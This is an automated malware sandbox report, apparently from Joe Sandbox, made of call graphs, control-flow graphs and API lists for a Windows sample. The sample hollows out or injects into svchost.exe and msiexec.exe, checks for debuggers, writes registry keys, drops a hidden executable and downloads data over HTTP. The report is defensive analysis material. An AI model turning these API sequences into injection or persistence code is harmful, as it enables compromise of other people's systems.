7ff7cdc44745 GetFileSize GetProcessHeap RtlAllocateHeap 1320->1322 1321->1174 1323 7ff7cdc4478e CloseHandle 1322->1323 1324 7ff7cdc447a0 ReadFile 1322->1324 1323->1321 1325 7ff7cdc447c7 GetProcessHeap HeapFree CloseHandle 1324->1325 1326 7ff7cdc447ef 1324->1326 1325->1321 1327 7ff7cdc44808 GetProcessHeap HeapFree CloseHandle 1326->1327 1331 7ff7cdc44830 1326->1331 1327->1321 1328 7ff7cdc4499b GetProcessHeap HeapFree CloseHandle 1328->1321 1329 7ff7cdc448eb GetProcessHeap RtlAllocateHeap 1330 7ff7cdc44934 1329->1330 1330->1328 1331->1328 1331->1329 1347 7ff7cdc44004 CreateToolhelp32Snapshot 1332->1347 1335 7ff7cdc440e4 1336 7ff7cdc4414b GetCurrentProcess OpenProcessToken 1335->1336 1337 7ff7cdc44168 LookupPrivilegeValueW 1336->1337 1338 7ff7cdc441c2 OpenProcess 1336->1338 1339 7ff7cdc441b7 CloseHandle 1337->1339 1340 7ff7cdc44190 AdjustTokenPrivileges 1337->1340 1341 7ff7cdc441e4 1338->1341 1343 7ff7cdc441ee 1338->1343 1339->1338 1340->1339 1344 7ff7cdc4424f 1341->1344 1345 7ff7cdc44244 CloseHandle 1341->1345 1343->1341 1346 7ff7cdc44222 WaitForSingleObject 1343->1346 1354 7ff7cdc42cb8 1343->1354 1344->1173 1345->1344 1346->1336 1346->1341 1348 7ff7cdc43342 1347->1348 1349 7ff7cdc4403f Process32FirstW 1347->1349 1348->1335 1350 7ff7cdc44099 CloseHandle 1349->1350 1351 7ff7cdc4405e wcscmp 1349->1351 1350->1348 1352 7ff7cdc44082 Process32NextW 1351->1352 1353 7ff7cdc44075 1351->1353 1352->1350 1352->1351 1353->1350 1357 7ff7cdc42d0b 1354->1357 1355 7ff7cdc42d2b 1355->1343 1357->1355 1358 7ff7cdc42d4d VirtualAllocEx 1357->1358 1362 7ff7cdc42a88 1357->1362 1358->1355 1359 7ff7cdc42d87 WriteProcessMemory 1358->1359 1359->1355 1360 7ff7cdc42dd0 VirtualProtectEx 1359->1360 1360->1355 1361 7ff7cdc42e03 CreateRemoteThread 1360->1361 1361->1355 1361->1357 1363 7ff7cdc42b01 1362->1363 1364 7ff7cdc42c0a StrStrA 1363->1364 1365 7ff7cdc42b08 1363->1365 1364->1363 1364->1365 1365->1357 1437 7ff7cdc430dc 1443 7ff7cdc430e5 1437->1443 1438 7ff7cdc431d1 1441 7ff7cdc43c24 RegDeleteKeyW 1441->1443 1442 7ff7cdc43e24 9 API calls 1442->1443 1443->1438 1443->1441 1443->1442 1444 7ff7cdc439b4 3 API calls 1443->1444 1446 7ff7cdc445c4 CreateFileW 1443->1446 1451 7ff7cdc43b84 RegOpenKeyExW 1443->1451 1445 7ff7cdc431c1 Sleep 1444->1445 1445->1443 1447 7ff7cdc4465a 1446->1447 1448 7ff7cdc4461f 1446->1448 1447->1443 1454 7ff7cdc44544 SetFilePointer WriteFile SetEndOfFile 1448->1454 1450 7ff7cdc4463b SetFileAttributesW CloseHandle 1450->1447 1452 7ff7cdc43bd8 RegSetValueExW RegCloseKey 1451->1452 1453 7ff7cdc43c12 1451->1453 1452->1453 1453->1443 1454->1450 1455 7ff7cdc41cdc 1456 7ff7cdc41d06 InternetOpenW 1455->1456 1457 7ff7cdc41d40 InternetOpenUrlW 1456->1457 1458 7ff7cdc41d33 Sleep 1456->1458 1459 7ff7cdc41dc9 HttpQueryInfoA 1457->1459 1460 7ff7cdc41d77 InternetOpenUrlW 1457->1460 1458->1456 1462 7ff7cdc41df8 InternetCloseHandle InternetCloseHandle Sleep 1459->1462 1463 7ff7cdc41e1e 1459->1463 1460->1459 1461 7ff7cdc41dae InternetCloseHandle Sleep 1460->1461 1461->1456 1462->1456 1464 7ff7cdc41e28 InternetCloseHandle InternetOpenUrlW 1463->1464 1465 7ff7cdc41e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1463->1465 1464->1465 1466 7ff7cdc41e6a InternetCloseHandle Sleep 1464->1466 1467 7ff7cdc41eea InternetCloseHandle InternetCloseHandle 1465->1467 1468 7ff7cdc41f04 1465->1468 1466->1456 1469 7ff7cdc41f83 1467->1469 1470 7ff7cdc41f0c InternetReadFile 1468->1470 1471 7ff7cdc41f5a InternetCloseHandle InternetCloseHandle 1468->1471 1470->1468 1470->1471 1471->1469 1478 7ff7cdc42f9c 1479 7ff7cdc438c4 11 API calls 1478->1479 1480 7ff7cdc42fdb 1479->1480 1481 7ff7cdc446e4 17 API calls 1480->1481 1482 7ff7cdc42fff 1481->1482 1483 7ff7cdc440c4 5 API calls 1482->1483 1484 7ff7cdc43022 1483->1484 1485 7ff7cdc440e4 13 API calls 1484->1485 1486 7ff7cdc43037 GetProcessHeap HeapFree 1485->1486

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_00007FF7CDC436EC 1 Function_00007FF7CDC431EC 63 Function_00007FF7CDC4306C 1->63 2 Function_00007FF7CDC432EC 14 Function_00007FF7CDC440E4 2->14 16 Function_00007FF7CDC446E4 2->16 57 Function_00007FF7CDC438C4 2->57 58 Function_00007FF7CDC440C4 2->58 81 Function_00007FF7CDC43C64 2->81 3 Function_00007FF7CDC433EC 4 Function_00007FF7CDC4E8F3 5 Function_00007FF7CDC4B2F4 6 Function_00007FF7CDC4C2F5 7 Function_00007FF7CDC4BCF1 8 Function_00007FF7CDC4ABF2 9 Function_00007FF7CDC436D8 10 Function_00007FF7CDC4A0DD 11 Function_00007FF7CDC430DC 40 Function_00007FF7CDC439B4 11->40 59 Function_00007FF7CDC445C4 11->59 92 Function_00007FF7CDC43B84 11->92 97 Function_00007FF7CDC43C24 11->97 98 Function_00007FF7CDC43E24 11->98 12 Function_00007FF7CDC41CDC 13 Function_00007FF7CDC4B3DA 54 Function_00007FF7CDC42CB8 14->54 15 Function_00007FF7CDC43CE4 69 Function_00007FF7CDC44674 16->69 17 Function_00007FF7CDC43609 18 Function_00007FF7CDC42008 19 Function_00007FF7CDC4B508 20 Function_00007FF7CDC4E008 21 Function_00007FF7CDC42F0C 22 Function_00007FF7CDC4D615 23 Function_00007FF7CDC4D915 24 Function_00007FF7CDC43F14 25 Function_00007FF7CDC43714 26 Function_00007FF7CDC4EC12 27 Function_00007FF7CDC4ABFB 28 Function_00007FF7CDC4ABF7 29 Function_00007FF7CDC4C2F7 30 Function_00007FF7CDC436FC 31 Function_00007FF7CDC4ABF9 32 Function_00007FF7CDC4C2F9 33 Function_00007FF7CDC4D904 34 Function_00007FF7CDC41000 35 Function_00007FF7CDC44004 36 Function_00007FF7CDC44404 104 Function_00007FF7CDC43B54 36->104 37 Function_00007FF7CDC4C501 38 Function_00007FF7CDC4BEAD 39 Function_00007FF7CDC433AC 99 Function_00007FF7CDC42048 39->99 41 Function_00007FF7CDC444B4 41->36 42 Function_00007FF7CDC4E99B 43 Function_00007FF7CDC4E997 44 Function_00007FF7CDC4359D 45 Function_00007FF7CDC42F9C 45->14 45->16 45->57 45->58 45->81 46 Function_00007FF7CDC4E999 47 Function_00007FF7CDC410A0 47->34 102 Function_00007FF7CDC41050 47->102 48 Function_00007FF7CDC443A4 49 Function_00007FF7CDC4C9CB 50 Function_00007FF7CDC41FC8 51 Function_00007FF7CDC433CC 51->99 52 Function_00007FF7CDC4EFCA 53 Function_00007FF7CDC4A2D0 84 Function_00007FF7CDC42A88 54->84 55 Function_00007FF7CDC4D8B8 56 Function_00007FF7CDC4D0C4 109 Function_00007FF7CDC43744 57->109 58->35 110 Function_00007FF7CDC44544 59->110 60 Function_00007FF7CDC4DEC1 61 Function_00007FF7CDC4DCC2 62 Function_00007FF7CDC42E6C 63->62 64 Function_00007FF7CDC4F26A 65 Function_00007FF7CDC4C673 66 Function_00007FF7CDC4A776 67 Function_00007FF7CDC4DE70 68 Function_00007FF7CDC43A74 68->40 68->57 68->109 70 Function_00007FF7CDC4A772 71 Function_00007FF7CDC4C65C 72 Function_00007FF7CDC4A258 73 Function_00007FF7CDC4EC58 74 Function_00007FF7CDC4345C 74->2 74->3 74->15 74->24 74->47 74->48 74->68 80 Function_00007FF7CDC44264 74->80 90 Function_00007FF7CDC4327C 74->90 94 Function_00007FF7CDC4321C 74->94 75 Function_00007FF7CDC4DE59 76 Function_00007FF7CDC4A05A 77 Function_00007FF7CDC4CF65 78 Function_00007FF7CDC4D365 79 Function_00007FF7CDC4B15F 96 Function_00007FF7CDC43B24 80->96 80->104 82 Function_00007FF7CDC4A061 83 Function_00007FF7CDC4D361 88 Function_00007FF7CDC42978 84->88 85 Function_00007FF7CDC41F88 86 Function_00007FF7CDC4338C 86->99 87 Function_00007FF7CDC4A18A 89 Function_00007FF7CDC4A778 90->41 90->57 91 Function_00007FF7CDC4A27F 93 Function_00007FF7CDC4D91D 95 Function_00007FF7CDC4C91A 99->18 99->50 99->85 100 Function_00007FF7CDC4A04E 101 Function_00007FF7CDC4CD54 103 Function_00007FF7CDC4DC55 105 Function_00007FF7CDC4A052 106 Function_00007FF7CDC4D339 107 Function_00007FF7CDC4DC46 108 Function_00007FF7CDC4D33F 109->25

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 231 7ff7cdc42048-7ff7cdc420c2 GetModuleFileNameW 232 7ff7cdc420c9-7ff7cdc42105 231->232 233 7ff7cdc420c4 231->233 234 7ff7cdc42107-7ff7cdc4210f 232->234 235 7ff7cdc4211d-7ff7cdc42139 call 7ff7cdc41f88 232->235 236 7ff7cdc4296d-7ff7cdc42975 233->236 237 7ff7cdc4213b-7ff7cdc42157 call 7ff7cdc41fc8 234->237 238 7ff7cdc42111-7ff7cdc42119 234->238 245 7ff7cdc4217c-7ff7cdc42186 235->245 237->245 240 7ff7cdc42159-7ff7cdc42175 call 7ff7cdc42008 238->240 241 7ff7cdc4211b-7ff7cdc42177 238->241 240->245 241->236 249 7ff7cdc42188 245->249 250 7ff7cdc4218d-7ff7cdc421e1 CreateProcessW 245->250 249->236 251 7ff7cdc421e8-7ff7cdc42228 CreateFileW 250->251 252 7ff7cdc421e3 250->252 253 7ff7cdc4222a 251->253 254 7ff7cdc4222f-7ff7cdc4224b GetFileSize 251->254 252->236 253->236 255 7ff7cdc42257-7ff7cdc42262 CloseHandle 254->255 256 7ff7cdc4224d-7ff7cdc42255 254->256 255->236 256->255 257 7ff7cdc42267-7ff7cdc4228f VirtualAlloc 256->257 258 7ff7cdc422a1-7ff7cdc422cc ReadFile 257->258 259 7ff7cdc42291-7ff7cdc4229c CloseHandle 257->259 260 7ff7cdc422ce-7ff7cdc422ec VirtualFree CloseHandle 258->260 261 7ff7cdc422f1-7ff7cdc4233f CloseHandle GetThreadContext 258->261 259->236 260->236 262 7ff7cdc42359-7ff7cdc423de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff7cdc42341-7ff7cdc42354 VirtualFree 261->263 264 7ff7cdc423f8-7ff7cdc42461 VirtualAllocEx 262->264 265 7ff7cdc423e0-7ff7cdc423f3 VirtualFree 262->265 263->236 266 7ff7cdc4247b-7ff7cdc424af WriteProcessMemory 264->266 267 7ff7cdc42463-7ff7cdc42476 VirtualFree 264->267 265->236 268 7ff7cdc424c9-7ff7cdc424d4 266->268 269 7ff7cdc424b1-7ff7cdc424c4 VirtualFree 266->269 267->236 270 7ff7cdc424e6-7ff7cdc424f9 268->270 269->236 271 7ff7cdc425a7-7ff7cdc425ee 270->271 272 7ff7cdc424ff-7ff7cdc42588 WriteProcessMemory 270->272 275 7ff7cdc42600-7ff7cdc42613 271->275 273 7ff7cdc4258a-7ff7cdc4259d VirtualFree 272->273 274 7ff7cdc425a2 272->274 273->236 274->270 277 7ff7cdc42619-7ff7cdc42668 RtlCompareMemory 275->277 278 7ff7cdc42898-7ff7cdc4291c WriteProcessMemory SetThreadContext 275->278 279 7ff7cdc4266a 277->279 280 7ff7cdc4266c-7ff7cdc42695 277->280 281 7ff7cdc4291e-7ff7cdc42931 VirtualFree 278->281 282 7ff7cdc42933-7ff7cdc42943 ResumeThread 278->282 279->275 284 7ff7cdc426a0-7ff7cdc426ae 280->284 281->236 285 7ff7cdc4295a-7ff7cdc42967 VirtualFree 282->285 286 7ff7cdc42945-7ff7cdc42958 VirtualFree 282->286 287 7ff7cdc426b4-7ff7cdc4273f 284->287 288 7ff7cdc42893 284->288 285->236 286->236 289 7ff7cdc42751-7ff7cdc4275f 287->289 288->278 290 7ff7cdc4288e 289->290 291 7ff7cdc42765-7ff7cdc42798 289->291 290->284 292 7ff7cdc4279a 291->292 293 7ff7cdc4279c-7ff7cdc4286f ReadProcessMemory WriteProcessMemory 291->293 292->289 295 7ff7cdc42889 293->295 296 7ff7cdc42871-7ff7cdc42884 VirtualFree 293->296 295->290 296->236
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction ID: b4faf71186f0e228297048bc4ba1d4986a880afdceaaa01462da15d5311d5c9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B32C53270CAC18AE7709F15E8597BAE3A1FB88B94F404135DA9D83B98EF3CD4558B50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 297 7ff7cdc4345c-7ff7cdc43472 call 7ff7cdc410a0 call 7ff7cdc4321c 302 7ff7cdc4347c-7ff7cdc434aa call 7ff7cdc44264 call 7ff7cdc43ce4 call 7ff7cdc43f14 297->302 303 7ff7cdc43474-7ff7cdc43476 ExitProcess 297->303 310 7ff7cdc434ac-7ff7cdc434bd call 7ff7cdc443a4 302->310 311 7ff7cdc434fb-7ff7cdc4350e call 7ff7cdc43f14 302->311 316 7ff7cdc434d2-7ff7cdc434d4 ExitProcess 310->316 317 7ff7cdc434bf-7ff7cdc434d0 call 7ff7cdc443a4 310->317 318 7ff7cdc4354c-7ff7cdc4355f call 7ff7cdc43f14 311->318 319 7ff7cdc43510-7ff7cdc43521 call 7ff7cdc443a4 311->319 317->316 328 7ff7cdc434da call 7ff7cdc432ec 317->328 329 7ff7cdc435a2-7ff7cdc435b8 call 7ff7cdc43a74 call 7ff7cdc433ec 318->329 330 7ff7cdc43561-7ff7cdc43572 call 7ff7cdc443a4 318->330 326 7ff7cdc4352b call 7ff7cdc4327c 319->326 327 7ff7cdc43523-7ff7cdc43525 ExitProcess 319->327 335 7ff7cdc43530-7ff7cdc43535 326->335 337 7ff7cdc434df-7ff7cdc434e4 328->337 349 7ff7cdc435ba-7ff7cdc435cb call 7ff7cdc443a4 329->349 350 7ff7cdc4360e-7ff7cdc436d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 329->350 344 7ff7cdc4357c call 7ff7cdc4327c 330->344 345 7ff7cdc43574-7ff7cdc43576 ExitProcess 330->345 339 7ff7cdc43537-7ff7cdc43542 Sleep 335->339 340 7ff7cdc43544-7ff7cdc43546 ExitProcess 335->340 342 7ff7cdc434e6-7ff7cdc434f1 Sleep 337->342 343 7ff7cdc434f3-7ff7cdc434f5 ExitProcess 337->343 339->335 342->337 348 7ff7cdc43581-7ff7cdc43586 344->348 351 7ff7cdc43588-7ff7cdc43593 Sleep 348->351 352 7ff7cdc43595-7ff7cdc43597 ExitProcess 348->352 355 7ff7cdc435cd-7ff7cdc435de call 7ff7cdc443a4 349->355 356 7ff7cdc435e0-7ff7cdc435e2 ExitProcess 349->356 351->348 355->356 359 7ff7cdc435e8 call 7ff7cdc432ec 355->359 361 7ff7cdc435ed-7ff7cdc435f2 359->361 362 7ff7cdc43601-7ff7cdc43603 ExitProcess 361->362 363 7ff7cdc435f4-7ff7cdc435ff Sleep 361->363 363->361
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                  • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                  • Instruction ID: 40430c6e0854b76e9e0379ce2750bc9c5fa78f159ebad19924cd9952dd155181
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE610A20B4C64389EA74BF30A85D3B9B262AF80721F900935D67E865E5EE2DE4078670

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction ID: 23f17c47814e2d8ce7d0a75902218287df803a137b0a55825b52885f5953d9c1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31153261CA818AD760EF04E45872AF7A1FBC4BA0F500135FB9E43A68EF7CD4028B10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction ID: 65cccfb00998bab0cf1a7f90774fa6d75984eda71fad0d75ae8be5450b33a5f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF05E20B0C28289E7327F65A40C379B7D1AF85B18F900574DABD06596EF2CE50ADB31

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 422 7ff7cdc41050-7ff7cdc4108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction ID: ba2847b9a22c2767adbd987830fe3843bb5b8e75af8c70c7861bbd9457e55d15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E09276609F8086CA20AF15F84401AB7B4FBC8794F904125EBCD42B28DF3CC165CB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7CDC43784
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: GetVolumeInformationW.KERNELBASE ref: 00007FF7CDC43801
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: wsprintfW.USER32 ref: 00007FF7CDC438A2
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4390D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43922
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43935
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43945
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43958
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4396D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43980
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43995
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                  • Instruction ID: e4daabe5cecf5a70f61cb760bfc28c8ee32b3a03586186f159d6fc7c04536ce0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7611572171C98689DB70AF25F85837AA362FBC4794F905431DB5E43A69EE3CD015CB50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7CDC43784
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: GetVolumeInformationW.KERNELBASE ref: 00007FF7CDC43801
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43744: wsprintfW.USER32 ref: 00007FF7CDC438A2
